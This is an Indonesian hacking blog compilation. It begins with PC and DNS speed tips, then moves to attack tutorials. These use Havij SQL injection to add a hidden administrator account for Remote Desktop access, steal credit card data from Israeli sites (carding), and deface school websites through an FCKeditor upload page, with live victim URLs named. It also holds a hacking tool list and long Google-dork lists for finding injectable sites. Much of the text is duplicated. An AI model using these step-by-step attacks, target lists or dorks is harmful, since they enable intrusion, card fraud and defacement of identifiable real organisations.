• Pada menu advanced >>> Virtual memory >> Change >> Klik pada drive c:Windows >> Pilih Custom Size >> Rubah Value pada initial size dan maximum Size 2 kali lipat dari value sebelumnya misal 256 rubah ke 512 , 512 rubah 1000) atau anda bisa merubah sesuai keinginan anda asal lebih besar dari value sebelumnya, Kemudian klik Ok
Tweaking dan Modifikasi diatas bertujuan untuk mengoptimalkan dan mempercepat proses kerja suatu program atau software. Dan untuk mencegah peringatan / warning Virtual memory too low pada saat menjalankan program yag berat seperti Adobe Photoshob, Corel Draw, Adobe Premiere, Pinacle dan program berat lain yang memerlukan Virtual memory yang besar. Dan juga hal ini untuk mendukung Memory Ram yang kecil sehingga masih bisa digunakan untuk menjalankan progam berat tersebut.
Setelah selesai Restart komputer anda maka Kinerja dan Performance Computer anda akan lebih cepat dari sebelumnya. Selamat Mencoba.
NB : jangan lupa restart komp
Menemukan DNS Server Untuk Menambah Kecepatan Koneksi Internet
Menemukan DNS Server untuk Menambah Kecepatan Koneksi Internet
Jadi, cara singkat kerjanya, komputer kita berkomunikasi dengan internet
menggunakan alamat IP, jadi ketika kita mengetikkan facebook.com
misalnya, komputer kita akan menanyakan ke DNS , apa alamat IP dari
facebook.com, kemudian setelah dibalas oleh DNS server dengan alamat IP
yang bersangkutan, komputer akan mencari alamat tersebut melalui ISP
(Internet Service Provide) kita seperti speedy, fastnet dan sebagainya.
Nah, setiap kita tersambung ke Internet, entah itu di kantor, rumah atau hotspot di kampus atau mall, pasti alamat DNS ini sudah ada secara otomatis (default). Yang akan kita lakukan disini adalah menemukan dan mengubah alamat DNS (yang juga berupa IP) atau biasa disebut custom DNS. Tujuan menggunakan custom DNS ini bermacam-macam diantaranya untuk memperbaiki kecepatan ber-Internet-ria.
Kecepatan kita saat koneksi ke Internet juga tergantung seberapa cepat DNS server dapat melayani permintaan kita untuk menerjemahkan nama domain (contohnya facebook.com) ke alamat IP yang bersangkutan. Biasanya ini sangat cepat, tapi karena DNS adalah server, kinerjanya juga tergantung kapasitas server tersebut (CPU, memory) dan juga jumlah layanan yang bisa dilayani sekaligus. Misalnya ketika permintaan melebihi kapasitas server DNS, maka yang akan terjadi adalah lambat atau malah keluar notifikasi error di browser kita.
Jika anda menginginkan tambahan kecepatan koneksi Internet, Google Public DNS adalah salah satu pilihannya. Alamat IP Google Public DNS adalah :8.8.8.8 / 8.8.4.4 (DNS Primary / Secondary).
Jika anda ingin lebih yakin lagi dan ingin lebih banyak alternatif DNS yang dapat meningkatkan kecepatan internet anda, anda bisa menggunakan NameBench. Aplikasi ini akan menguji koneksi Internet Anda dengan menggunakan beberapa DNS server kemudian akan merekomendasikan DNS alternatif sesuai kecepatan dan kedekatannya. Cara menggunakannya:
1. setelah didownload (silahkan pilih download sesuai Sistem Operasi anda di halaman kanan atas website Namebench), jalankan aplikasi seperti gambar dibawah :
2. Langsung klik “Start Benchmark” .
3. Setelah melakukan pengujian atau benchmarking selama sekitar 6-10 menit, maka hasilnya akan ditampilkan di browser. Berikut adalah contoh hasil pengujian Namebench pada koneksi speedy yang ane pakai :
Ya, pada hasil tersebut Google Public DNS mendapatkan hasil rekomendasi
terbaik dengan kemungkinan menambah kecepatan sebesar 28%. Namun hasil
tersebut akan berbeda beda sesuai layanan Internet yang anda pakai.
Selain itu Namebench juga memberikan alternatif Secondary (pada contoh
diatas CepatNet-2 ID / 202.43.178.245) dan Tertiary Server (pada contoh
diatas Telekomspeedy Jakarta-4 ID /202.134.0.61 ). Jadi ternyata DNS
Telkomspeedy sendiri berada di urutan ketiga berdasarkan kecepatan dan
kedekatan dengan koneksi Internet kita.
Setelah menemukan alamat DNS server yang cocok , Cara Edit DNS di Komputer
Sebagai tambahan, selain alasan kecepatan, ada 2 alasan utama lain pengguna menggunakan custom DNS.
Yang pertama adalah alasan keamanan. Untuk hal ini pengguna mengiginkan DNS yang juga mempunyai kemampuan mendeteksi alamat-alamat website yang punya potensi berbahaya seperti phising, malware . Custom DNS yang jadi favorit pengguna diantaranya adalah Sunbelt ClearCloud dengan alamat : 74.118.212.1 / 74.118.212.2 (Primary / Secondary)
Kemudian yang kedua adalah alasan filterisasi konten. Jika anda menginginkan kenyamanan Internet dengan isi konten yang family friendly, maksudnya aman diakses seluruh anggota keluarga terutama anak kecil, seperti tidak ada konten pornografi dsb, maka salah satu pilihannya adalah menggunakan Open DNS dengan alamat 208.67.222.222 / 208.67.220.220 (Primary / Secondary)
Spoiler: Pengertian DNS
Nah, setiap kita tersambung ke Internet, entah itu di kantor, rumah atau hotspot di kampus atau mall, pasti alamat DNS ini sudah ada secara otomatis (default). Yang akan kita lakukan disini adalah menemukan dan mengubah alamat DNS (yang juga berupa IP) atau biasa disebut custom DNS. Tujuan menggunakan custom DNS ini bermacam-macam diantaranya untuk memperbaiki kecepatan ber-Internet-ria.
Kecepatan kita saat koneksi ke Internet juga tergantung seberapa cepat DNS server dapat melayani permintaan kita untuk menerjemahkan nama domain (contohnya facebook.com) ke alamat IP yang bersangkutan. Biasanya ini sangat cepat, tapi karena DNS adalah server, kinerjanya juga tergantung kapasitas server tersebut (CPU, memory) dan juga jumlah layanan yang bisa dilayani sekaligus. Misalnya ketika permintaan melebihi kapasitas server DNS, maka yang akan terjadi adalah lambat atau malah keluar notifikasi error di browser kita.
Jika anda menginginkan tambahan kecepatan koneksi Internet, Google Public DNS adalah salah satu pilihannya. Alamat IP Google Public DNS adalah :8.8.8.8 / 8.8.4.4 (DNS Primary / Secondary).
Jika anda ingin lebih yakin lagi dan ingin lebih banyak alternatif DNS yang dapat meningkatkan kecepatan internet anda, anda bisa menggunakan NameBench. Aplikasi ini akan menguji koneksi Internet Anda dengan menggunakan beberapa DNS server kemudian akan merekomendasikan DNS alternatif sesuai kecepatan dan kedekatannya. Cara menggunakannya:
1. setelah didownload (silahkan pilih download sesuai Sistem Operasi anda di halaman kanan atas website Namebench), jalankan aplikasi seperti gambar dibawah :
Spoiler: 1
2. Langsung klik “Start Benchmark” .
3. Setelah melakukan pengujian atau benchmarking selama sekitar 6-10 menit, maka hasilnya akan ditampilkan di browser. Berikut adalah contoh hasil pengujian Namebench pada koneksi speedy yang ane pakai :
Spoiler: 2
Setelah menemukan alamat DNS server yang cocok , Cara Edit DNS di Komputer
Sebagai tambahan, selain alasan kecepatan, ada 2 alasan utama lain pengguna menggunakan custom DNS.
Yang pertama adalah alasan keamanan. Untuk hal ini pengguna mengiginkan DNS yang juga mempunyai kemampuan mendeteksi alamat-alamat website yang punya potensi berbahaya seperti phising, malware . Custom DNS yang jadi favorit pengguna diantaranya adalah Sunbelt ClearCloud dengan alamat : 74.118.212.1 / 74.118.212.2 (Primary / Secondary)
Kemudian yang kedua adalah alasan filterisasi konten. Jika anda menginginkan kenyamanan Internet dengan isi konten yang family friendly, maksudnya aman diakses seluruh anggota keluarga terutama anak kecil, seperti tidak ada konten pornografi dsb, maka salah satu pilihannya adalah menggunakan Open DNS dengan alamat 208.67.222.222 / 208.67.220.220 (Primary / Secondary)
Cari Akses Remote Desktop Menggunakan Havij
kali ini ane mau share gimana caranya kita mendapatkan akses server dengan memanfaatkan havij ..
tidak selalu kita mengendalikan web dengan Shell entah b374k atau lotus,atau apapun nama shellnya,kita juga bisa memanfaatkan fitur bawaan windows yaitu Remote Desktop,hanya saja kita tetep harus tahu Username dan Password untuk bisa mengakses server korban
untuk teman-teman yang belum tau apa sihh REMOTE DEKSTOP itu ..
silahkan googling dulu ., biar usaha dikit ..
ok langsung ke tutorialnya aja ..
Bila kita melakukan tehnik Sql Injection dan mendapatkan username dan password korban belum tentu itu sama untuk login ke komputer,lha terus mesti gimana??kita bisa memanfaatkan Havij untuk itu ..
step by stepnya :
1. ane anggap teman2 dah punya sebuah target yang di scan menggunakan havij ( table sudah terbuka )
2. jika sudah ., silahkan teman2 pilik icon CMD SHELL kemudian pilih "net user (nama login kesukaan) ( password) /add" dan kita klik "execute"
3. setelah selesai kita pilih "net localgroup administrators (nama login kesukaan) /add" dan klik lagi "execute"
4. CROTTTZ .. CARA PERTAMA DONE !!
lanjut., kita buka fasilitas windows nya , dengan cara start -> all programa -> accessories -> remote desktop
5. masukkan username dan password yang udah kita buat tadi...
6. dan akhirnya kita telah ada di server korban ..
Sekian Dan Terima Kasih :)
tidak selalu kita mengendalikan web dengan Shell entah b374k atau lotus,atau apapun nama shellnya,kita juga bisa memanfaatkan fitur bawaan windows yaitu Remote Desktop,hanya saja kita tetep harus tahu Username dan Password untuk bisa mengakses server korban
untuk teman-teman yang belum tau apa sihh REMOTE DEKSTOP itu ..
silahkan googling dulu ., biar usaha dikit ..
ok langsung ke tutorialnya aja ..
Bila kita melakukan tehnik Sql Injection dan mendapatkan username dan password korban belum tentu itu sama untuk login ke komputer,lha terus mesti gimana??kita bisa memanfaatkan Havij untuk itu ..
step by stepnya :
- Dork inurl:/*.asp?id=
- TOOLS HAVIJ
- TOOLS HAVIJ
1. ane anggap teman2 dah punya sebuah target yang di scan menggunakan havij ( table sudah terbuka )
2. jika sudah ., silahkan teman2 pilik icon CMD SHELL kemudian pilih "net user (nama login kesukaan) ( password) /add" dan kita klik "execute"
3. setelah selesai kita pilih "net localgroup administrators (nama login kesukaan) /add" dan klik lagi "execute"
Spoiler: pict 2
4. CROTTTZ .. CARA PERTAMA DONE !!
lanjut., kita buka fasilitas windows nya , dengan cara start -> all programa -> accessories -> remote desktop
5. masukkan username dan password yang udah kita buat tadi...
6. dan akhirnya kita telah ada di server korban ..
Sekian Dan Terima Kasih :)
Sabtu, 23 Februari 2013
How To Hacking Paypal ( Carding )
kali ini Irgan Ganteng akan membuat tutorial cara carding yg dimana target yg kuserang
adalah
masyarakat yahudi / israel,sebanarnya ada banyak cara bisa hack email
orang trus lakukan verifikasi akun fakelogin paypal dll tapi kali ini
cyber-hatuhaha kombinasi dengan Sql injection.tahu kan Sql injection itu
itu yang hack database,awas jangan sampai akun negara sendiri di
carding, ku sumpahin biar jadi Ikan paus..........
Kali ini saya beralih lagi ke windows...........
Hufff windows lagiiiiiiiii
tools yg di siapkan yaitu:
- buka google extractor, lalu masukan dork product.asp?id= site:il (harus il, kalo .id tak sumpahin jadi babi)
- trus scan, kalo sudah muncul link" yg kluar silah kan di click kanan trus remove duplicate, biar ga keder
- lalu pindah ke TAB sql injector query builder
- masukan argumen tanda tanya(?)di insert arguments here
- kalo sudah klick Build Dan Scan
- trus ke tab berikut nya yaitu tab attack victim
- cari yg error result nya : unclosed quotation mark before the character ..... ga tau knp pokok nya ikutin aja jgn banyak tanya :p
- klick kanan copy url yg victim
- tahap pemakaian sql exploiter2
- buka sql exploiter trus ke tab attacker for the hackable SHIT !!
- klik add manualy , masukan url yg victim tadi, trus paste (kadang tanda ' harus di hilangkan)
- kalo udah klick site info sampe info nya keluar
- kalo udah keluar maka tingal get table, maka akan muncul table" web tersebut, yg ku tandai warna biru
- pilih salah 1 yg ada di table tsbt, yg kira" dimana letak CC nya, trus get columb buat mengetahui colum apa aja di table tsb, tapi x ini aku ga ke table order
- kalo udah muncul smua colomb , drag smua colom trus get data
saya gak ngajarin kejahatan lho, cuma buat info aja, kalo di tangkep interpol jgn bawa" nm saya :p
saya cuma manusia biasa yg bertugas sebagai panitia hari kiamat.........!!!
[New]Software Hacking - Cracking 2013
Kali ini Irgan Ganteng akan update yaitu tentang Macam-macam software Hacking-Cracking 2013. Check it out :
1. PWN STAR Sebuah script bash untuk meluncurkan AP , dapat dikonfigurasi dengan berbagai macam pilihan serangan. Termasuk sejumlah script index.html dan server php, untuk phishing. Dapat bertindak sebagai multi-klien captive portal menggunakan php dan iptables. Eksploitasi klasik seperti kejahatan-PDF, De-auth dengan aireplay, dll. PwnStar BinusHacker Fitur Umum: Mengelola Antarmuka dan MAC Spoofing Mengatur sniffing Web phishing Karmetasploit WPA handshake De-auth klien Mengelola Iptables
Fitur Umum:
-Mengelola Antarmuka dan MAC Spoofing
-Mengatur sniffing
-Web phishing
-Karmetasploit
-WPA handshake
-De-auth klien Mengelola Iptables
Download PwnStar Disini
2. ZED Attack Proxy (ZAP) (ZAP) adalah alat penetrasi pengujian terpadu untuk menemukan kerentanan dalam aplikasi web. Tools ini dirancang untuk digunakan oleh orang-orang dengan berbagai pengalaman security dan dengan demikian sangat ideal untuk para pengembang dan penguji fungsional yang baru untuk penetration testing serta menjadi tambahan yang berguna untuk toolbox tester.
-Intercepting Proxy
-Active scanner
-Passive scanner
-Brute Force scanner
-Spider
-Fuzzer
-Port Scanner
-Dynamic SSL certificates
-API
-Beanshell integration
Download disini
3. SET (Social Engineering Toolkit) Tools yang berfokus pada menyerang unsur kelemahan dan kelengahan manusia. Tool ini sangat banyak digunakan saat ini dan merupakan salah satu tools yang sukses di demonstrasikan di Defcon.
Fitur Utama:
-Spear-Phishing Attack Vector
-Java Applet Attack Vector
-Metasploit Browser Exploit Method
-Credential Harvester Attack Method
-Tabnabbing Attack Method
-Man Left in the Middle Attack Method
-Web Jacking Attack Method
-Multi-Attack Web Vector
-Infectious Media Generator
-Teensy USB HID Attack Vector
Download disini
Bagaimana? menarik bukan? jangan disalah gunakan yah software ini :3
hacking tools 2013
cracking tools 2013 security tools 2013 pentesting tools 2013
Ayo buruan download penetration testing 2013 and security tools 2013,
networking tools 2013, gmail hacking tools 2013, learn ethical hacking
2013, vulnerability assessment 2013, penetration testing 2013, email
hacking 2013, password hacking 2013, reverse engineering 2013. Download
hacking tools, networking tools, gmail hacking, learn ethical hacking,
vulnerability, penetration testing, hack email, hacking, password
hacking, reverse engineering 2013, wifi hacker 2013. Hacker Tools 2013,
Hack Tool 2013, Hacker Tool 2013, Hacking Tool 2013, Hack Tool 2013,
Cracking Tools 2013, Cracker Tools 2013, Cracking Tool 2013, Cracker
Tool 2013, Crack Tools 2013, Crack Tool 2013, Security Tool 2013,
Pentester Tool 2013, Password Cracker 2013, Password Hacking 2013.
1. PWN STAR
Sebuah script bash untuk meluncurkan AP , dapat dikonfigurasi dengan
berbagai macam pilihan serangan. Termasuk sejumlah script index.html dan
server php, untuk phishing. Dapat bertindak sebagai multi-klien captive
portal menggunakan php dan iptables. Eksploitasi klasik seperti
kejahatan-PDF, De-auth dengan aireplay, dll.
PwnStar BinusHacker
Fitur Umum:
Mengelola Antarmuka dan MAC Spoofing
Mengatur sniffing
Web phishing
Karmetasploit
WPA handshake
De-auth klien
Mengelola Iptables
Download PwnStar Disini:
2. ZED Attack Proxy (ZAP)
(ZAP) adalah alat penetrasi pengujian terpadu untuk menemukan kerentanan
dalam aplikasi web. Tools ini dirancang untuk digunakan oleh
orang-orang dengan berbagai pengalaman security dan dengan demikian
sangat ideal untuk para pengembang dan penguji fungsional yang baru
untuk penetration testing serta menjadi tambahan yang berguna untuk
toolbox tester.
ZAP - Zen Attack Proxy 2013
Fitur Utama:
Intercepting Proxy
Active scanner
Passive scanner
Brute Force scanner
Spider
Fuzzer
Port Scanner
Dynamic SSL certificates
API
Beanshell integration
Download ZAP Disini:
Sumber: http://vefbriavionic1.blogspot.com/2013/01/software-hacking-cracking-2013_23.html
Konten adalah milik dan hak cipta buka-rahasia.blogspot.com
Sumber: http://vefbriavionic1.blogspot.com/2013/01/software-hacking-cracking-2013_23.html
Konten adalah milik dan hak cipta buka-rahasia.blogspot.com
1. PWN STAR Sebuah script bash untuk meluncurkan AP , dapat dikonfigurasi dengan berbagai macam pilihan serangan. Termasuk sejumlah script index.html dan server php, untuk phishing. Dapat bertindak sebagai multi-klien captive portal menggunakan php dan iptables. Eksploitasi klasik seperti kejahatan-PDF, De-auth dengan aireplay, dll. PwnStar BinusHacker Fitur Umum: Mengelola Antarmuka dan MAC Spoofing Mengatur sniffing Web phishing Karmetasploit WPA handshake De-auth klien Mengelola Iptables
Fitur Umum:
-Mengelola Antarmuka dan MAC Spoofing
-Mengatur sniffing
-Web phishing
-Karmetasploit
-WPA handshake
-De-auth klien Mengelola Iptables
Download PwnStar Disini
2. ZED Attack Proxy (ZAP) (ZAP) adalah alat penetrasi pengujian terpadu untuk menemukan kerentanan dalam aplikasi web. Tools ini dirancang untuk digunakan oleh orang-orang dengan berbagai pengalaman security dan dengan demikian sangat ideal untuk para pengembang dan penguji fungsional yang baru untuk penetration testing serta menjadi tambahan yang berguna untuk toolbox tester.
Fitur Utama:
Intercepting Proxy
Active scanner
Passive scanner
Brute Force scanner
Spider
Fuzzer
Port Scanner
Dynamic SSL certificates
API
Beanshell integration
Sumber: http://vefbriavionic1.blogspot.com/2013/01/software-hacking-cracking-2013_23.html
Konten adalah milik dan hak cipta buka-rahasia.blogspot.com
Fitur Utama:Sumber: http://vefbriavionic1.blogspot.com/2013/01/software-hacking-cracking-2013_23.html
Konten adalah milik dan hak cipta buka-rahasia.blogspot.com
-Intercepting Proxy
-Active scanner
-Passive scanner
-Brute Force scanner
-Spider
-Fuzzer
-Port Scanner
-Dynamic SSL certificates
-API
-Beanshell integration
Download disini
3. SET (Social Engineering Toolkit) Tools yang berfokus pada menyerang unsur kelemahan dan kelengahan manusia. Tool ini sangat banyak digunakan saat ini dan merupakan salah satu tools yang sukses di demonstrasikan di Defcon.
Fitur Utama:
-Spear-Phishing Attack Vector
-Java Applet Attack Vector
-Metasploit Browser Exploit Method
-Credential Harvester Attack Method
-Tabnabbing Attack Method
-Man Left in the Middle Attack Method
-Web Jacking Attack Method
-Multi-Attack Web Vector
-Infectious Media Generator
-Teensy USB HID Attack Vector
Download disini
Bagaimana? menarik bukan? jangan disalah gunakan yah software ini :3
Jumat, 22 Februari 2013
Cara Deface Web Sekolah (Sch.id)
Maaf Kalo Gambarnya kagak nyambung.Kita Awali dengan Niat yang baik.
1. Siapkan file txt di desain yah..:D.
2. Dork:
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
3. Exploit: /editor/filemanager/connectors/test.html
/editor/filemanager/connectors/uploadtest.html
*Pakai salah satu Exploitnya*
EX:
http://xxx.sch.id/html/siswa.php
http://xxx.sch.id/html/almni.php
http://xxx.sch.id/html/guru.php
*Sesuai Dork.
Ganti jadi:
http://xxxx.sch.id/editor/filemanager/connectors/uploadtest.html
4. Ganti ASP jadi PHP.
5. Browse file txt yang sudah disiapkan -> open -> upload.
6. Hasilnya: http://xxx.sch.id/userfiles/file/nama-file.txt
live target :
http://sdia20.sch.id/simk/atk/attributes/fck/editor/filemanager/connectors/test.html
http://www.e-learning.smpbatikska.sch.id/editor/filemanager/connectors/test.html
http://sman1kotabaru.sch.id/editor/filemanager/connectors/test.html
http://smansa-pringsewu.sch.id/editor/filemanager/connectors/test.html
http://www.smkn1kuta.sch.id/editor/filemanager/connectors/test.html
http://smp1ponjong.sch.id/editor/filemanager/connectors/test.html
BloodyTears_Art
Sekian Tutorial dari saya jangan di salah gunakan bro .. . . !!!!
Dork Untuk Deface Website Lengkap Bro :D
Kali ini Irgan akan berbagi dork deface website loh, dari pada kelamaan mending langsung aja ya hihihi Kumpulan Dork
ini dapat kamu gunakan untuk mencari target website yang vuln terhadap
SQLI Injection sob. Oke berikut ini kumpulan dork nya:
check this on:
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
" ""Jax Calendar v1.34 by Jack (tR), http://www.jtr.de/scripting/php"""
" ""Powered By Azadi Network"" "
""" ActiveKB v1.5 Copyright ©"""
""" Powered by JTL-Shop 2"" "
""" Powered by Pie Cart Pro """
""" Powered by Xpoze """
""" created by creato.biz """
"""& Spider Friendly by Crack"""
"""© This site is NITROpowered!"""
"""© by CyberTeddy"""
"""/index.php?id=cmp-noticias"""
"""/nuke/htmltonuke.php"" - ""htmltonuke.php"""
"""/nuke/iframe.php"""
"""/subcat.php?cate_id="""
"""100% | 50% | 25%"" ""Back to gallery"" inurl:""show.php?imageid="""
"""1999-2004 FuseTalk Inc"" -site:fusetalk.com"
"""2003 DUware All Rights Reserved"""
"""2004-2005 ReloadCMS Team."""
"""2005 http://www.frank-karau.de"" | ""2006 http://www.frank-karau.de"""
"""2005 SugarCRM Inc. All Rights Reserved"" ""Powered By SugarCRM"""
"""2006 by http://www.mani-stats-reader.de.vu"""
"""2007 BookmarkX script"""
"""2007 RADIOZAZA http://www.radiozaza.de? istek hatti Version 2.5"" "
"""2007 Rafal Kucharski"""
"""2009 Jorp"""
"""ATutor 1.6.4"" "
"""Absolute Poll Manager XE"""
"""AcmlmBoard v1.A2"""
"""Active Webcam Page"" inurl:8080"
"""ActualAnalyzer Lite (free) 2.78""+""Copyright © 2006 ActualScripts"" "
"""Affiliate Network Pro"""
"""All Rights Reserved. Powered by DieselScripts.com"" "
"""AlumniServer project"""
"""Aurora CMS"""
"""Barbecued by sNews"""
"""Basado en Spirate"""
"""Based on DoceboLMS 2.0"""
"""Betrieben mit Serendipity 1.0.3"""
"""BioScripts"""
"""BlackBoard 1.5.1-f | © 2003-4 by Yves Goergen"""
"""BlogMe PHP created by Gamma Scripts"""
"""BosDates Calendar System "" ""powered by BosDates v3.2 by BosDev"""
"""Browse with Interactive Map"""
"""Bu Site Ticimax E-Ticaret yazılımı ile hazırlanmıştır."""
"""By Geeklog"" ""Created this page in"" +seconds +powered "
"""By Geeklog"" ""Created this page in"" +seconds +powered inurl:public_html "
"""CMS Webmanager-pro"""
"""CNStats 2.9"""
"""CaLogic Calendars V1.2.2"""
"""Calendar programming by AppIdeas.com"" filetype:php"
"""ClanSys v.1.1"""
"""Cms.tut.su, 2009 g."""
"""Content managed by the Etomite Content Management System"""
"""Copyright © 2000 Phorum Development Team"""
"""Copyright © 2004-2006 by Simple PHP Guestbook"" "
"""Copyright 2000 - 2005 Miro International Pty Ltd. All rights reserved"" ""Mambo is Free Software released"""
"""Copyright 2004 easy-content forums"""
"""Copyright 2004 © Digital Scribe v.1.4"""
"""Copyright 2005 Affiliate Directory"""
"""Copyright 2008 ImenAfzar ver :2.0.0.0"""
"""Copyright @2007 Iatek LLC"""
"""Copyright Devellion Limited 2005. All rights reserved."""
"""Copyright Interactivefx.ie"" "
"""Copyright KerviNet"""
"""Copyright MaxiSepet ©"" "
"""Copyright © 2002 Agustin Dondo Scripts"""
"""Copyright-2008@zeejobsite.com"""
"""Copyrights © 2005 Belgische Federale Overheidsdiensten"""
"""CosmoShop by Zaunz Publishing"" inurl:""cgi-bin/cosmoshop/lshop.cgi"" -johnny.ihackstuff.com -V8.10.106 -V8.10.100 -V.8.10.85 -V8.10.108 -V8.11*"
"""Create your own free webring and bring traffic to your website. Join now, it's free!"""
"""Created by weenCompany"" "
"""Creative Guestbook"""
"""Cyphor (Release:"" -www.cynox.ch"
"""CzarNews v1.12 "" | ""CzarNews v1.13"" | ""CzarNews v1.14 """
"""DeeEmm CMS"""
"""Desenvolvido por WeBProdZ"""
"""Desenvolvido por: Fio Mental"""
"""Designed & Developed by N.E.T E-Commerce Group. All Rights Reserved."""
"""Designed & Developed by Zeeways.com"""
"""Designed & Developed by net-finity"""
"""Designed and Developed by Debliteck Ltd"" "
"""Designed and powered by AWS Sports"""
"""Designed by Spaceacre"" "
"""Devana is an open source project !"""
"""Developed by Bispage.com"" "
"""Developed by Infoware Solutions"""
"""Developed by Quate.net."""
"""Developed by rbk"""
"""Diseño Web Hernest Consulting S.L."" "
"""Driven by DokuWiki"""
"""Easy-Clanpage v2.2"""
"""Emanuele Guadagnoli"" ""CcMail"""
"""Emefa Guestbook V 3.0"""
"""Enter ip"" inurl:""php-ping.php"""
"""Everyone should be on TV! Now you can upload 2 TV"""
"""Eyeland Studio Inc. All Rights Reserved."" "
"""Eyeland Studio Inc. All Rights Reserved."" inurl:game.php "
"""FC Bigfeet"" -inurl:mail"
"""Factux le facturier libre V 1.1.5"" "
"""FlatNuke"" ""Valid HTML 4.01!"" ""Valid CSS!"" ""Get RSS 2.0 Feed"" ""Get RSS "
"""FlatNuke"" ""Valid HTML 4.01!"" ""Valid CSS!"" ""Get RSS 2.0 Feed"" ""Get RSS"
"""Forum Active Bulletin Board version 1.1 béta 2"""
"""FrontAccounting"""
"""Galerie 3.2 © 2004 by progressive"""
"""Gallery powered by fMoblog"""
"""Généré par KDPics v1.18"" "
"""Help * Contact * Imprint * Sitemap"" | ""powered by papoo"" | ""powered by cms papoo"""
"""Help desk software by United Web Coders rev. 3.0.640"" "
"""IceWarp Web Mail 5.3.0"" ""Powered by IceWarp"""
"""Ideal BB Version: 0.1"" -idealbb.com"
"""Instant Free File Uploader"" "
"""Internet Photoshow - Slideshow"""
"""Jevonweb Guestbook"""
"""Jinzora Media Jukebox"""
"""Ladder Scripts by http://www.mygamingladder.com"""
"""Ladder Scripts by"""
"""Liberum Help Desk, Copyright © 2001 Doug Luxem"""
"""Liberum Help Desk, Copyright © 2001 Doug Luxem. Please view the license"
"""LinPHA Version 1.3.x"" or ""The LinPHA developers"" "
"""Maintained with Subscribe Me 2.044.09p""+""Professional"" inurl:""s.pl"""
"""MangoBery 1.0 Alpha"""
"""Marketplace Version 1.1.1"""
"""Members Statistics"" +""Total Members"" +""Guests Online"""
"""MidiCart PHP Database Management"""
"""Mimicboard2 086""+""2000 Nobutaka Makino""+""password""+""message"" inurl:page=1"
"""MobPartner Counter"" ""upload files"" "
"""Multi-Page Comment System"""
"""MunzurSoft Wep Portal W3"""
"""My Photo v1.46.4 © Big Resources"""
"""News Managed by Ditto News"""
"""News generated by Utopia News Pro"" | ""Powered By: Utopia News Pro"""
"""Obtenez votre forum Aztek"" -site:forum-aztek.com"
"""Online Store - Powered by ProductCart"""
"""PHP BP Team"" "
"""PHP Easy Downloader"""
"""PHP Gallery © 2010 PHP Weby hostgator coupon"" "
"""PHP Gallery © 2010 PHP Weby hostgator coupon"""
"""PHP Link Portal v1.95.1 © Big Resources, Inc."""
"""PHP Project Management 0.8.10"""
"""PHP WEBQUEST VERSION "" or inurl:""/phpwebquest/"" "
"""PHPAuction GPL Enhanced V2.51 by AuctionCode.com"" "
"""PHPGlossar Version 0.8"""
"""PHPNews Version 0.93"""
"""PHPWebAdmin for hMailServer"" intitle:PHPWebAdmin -site:hmailserver.com"
"""PKs Movie Database"""
"""POWERED BY ALITALK"""
